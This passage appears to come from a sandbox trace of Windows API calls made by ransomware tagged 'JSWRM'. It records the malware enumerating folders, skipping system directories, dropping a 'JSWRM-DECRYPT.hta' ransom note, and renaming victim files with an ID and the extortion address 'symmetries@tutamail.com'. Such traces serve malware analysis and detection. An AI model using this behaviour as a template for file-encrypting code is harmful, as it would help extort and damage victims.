lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0067.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Content.xml", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0067.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Content.xml", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Content.xml", lpUsedDefaultChar=0x0) returned 11 [0067.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.720] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.720] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.720] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0067.720] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.721] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9655155203132480) returned 0 [0067.721] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0067.721] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0067.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.721] CloseHandle (hObject=0xffffffff) returned 1 [0067.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0067.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0067.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0067.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.721] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0067.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0067.721] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.722] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\Content.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0067.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0067.722] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0554b83, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2=".") returned 1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2="..") returned 1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2="...") returned 1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2="windows") returned -1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2="recovery") returned -1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2="perflogs") returned -1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2="documents and settings") returned -1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2="$RECYCLE.BIN") returned 1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2="system volume information") returned -1 [0067.722] lstrcmpiW (lpString1="cs-CZ", lpString2="msocache") returned -1 [0067.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0067.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.722] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\jswrm-decrypt.hta")) returned 0xffffffff [0067.722] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.722] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0067.722] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0067.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.723] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.723] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.723] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.723] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.723] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.724] CloseHandle (hObject=0x454) returned 1 [0067.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.724] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0067.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0067.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0067.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.725] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.725] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\jswrm-decrypt.hta")) returned 0x20 [0067.725] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.726] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.726] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.726] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0554b83, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f05eae6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231d40 [0067.726] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.726] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0554b83, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f05eae6, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.726] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.726] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.727] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f05eae6, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f05eae6, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f084cde, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.727] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.727] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.727] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.727] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e316e09, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e316e09, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e316e09, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.727] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.727] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.727] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.727] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.727] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.727] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.727] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.728] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.728] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.728] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0067.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0067.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0067.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0067.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.728] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0067.728] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.728] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10083861658849096) returned 0 [0067.728] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.728] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.728] CloseHandle (hObject=0xffffffff) returned 1 [0067.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0067.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0067.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0067.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.729] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\cs-CZ\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0067.729] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e316e09, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e316e09, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e316e09, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.729] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0067.729] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05550d5, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="da-DK", cAlternateFileName="")) returned 1 [0067.729] lstrcmpiW (lpString1="da-DK", lpString2=".") returned 1 [0067.729] lstrcmpiW (lpString1="da-DK", lpString2="..") returned 1 [0067.729] lstrcmpiW (lpString1="da-DK", lpString2="...") returned 1 [0067.729] lstrcmpiW (lpString1="da-DK", lpString2="windows") returned -1 [0067.729] lstrcmpiW (lpString1="da-DK", lpString2="recovery") returned -1 [0067.729] lstrcmpiW (lpString1="da-DK", lpString2="perflogs") returned -1 [0067.729] lstrcmpiW (lpString1="da-DK", lpString2="documents and settings") returned -1 